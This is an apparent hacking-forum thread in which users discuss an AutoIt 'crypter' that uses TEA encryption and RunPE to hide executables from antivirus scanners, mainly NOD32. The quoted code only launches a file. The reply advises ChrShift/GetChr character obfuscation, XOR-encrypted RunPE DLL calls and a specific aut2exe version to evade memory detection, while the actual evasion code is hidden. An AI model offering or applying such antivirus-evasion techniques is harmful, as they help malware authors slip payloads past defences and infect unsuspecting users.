Locked how to generate autoit shellcodes


mark_deno

I am currently working on an AutoIt crypter source (scantime),

so I edited it with new encryption, TEA, and RunPE (for runtime).

The result is 5/60.

NOD32 keeps catching this part of my shellcode RunPE:

How do I pass this?

Can I use M3's alternative shellcode?

;=================================
; Author: M3
; Alternative Shell Execute AutoIt
; Thanks to Black Zerox
; Usage: sShell(path + exe)
;=================================

; Launch the file at $Path through the Shell.Application COM object
Func sShell($Path)
    Local $Shell = ObjCreate("shell.application")
    $Shell.ShellExecute($Path, "")
EndFunc

Edited by CrypterHacker

Re: how to generate autoit shellcodes

 


 

chequinho is right, the code by M3 simply runs a file.

To bypass memory operations in NOD32 you can simply use ChrShift or GetChr with simple math.

Here is an example of GetChr with simple math (this method is used by RazorCrypt, but I changed it somewhat):

[hidden content]

 

And ChrShift example:

 

[hidden content]

 

My stub with encrypted RunPE DLL calls with ChrShift and XOR encryption gives this:

Result: [hidden content]

 

 

Also, use 3.3.8.1 version of aut2exe.

Edited by DDoSer
This topic is now closed to further replies.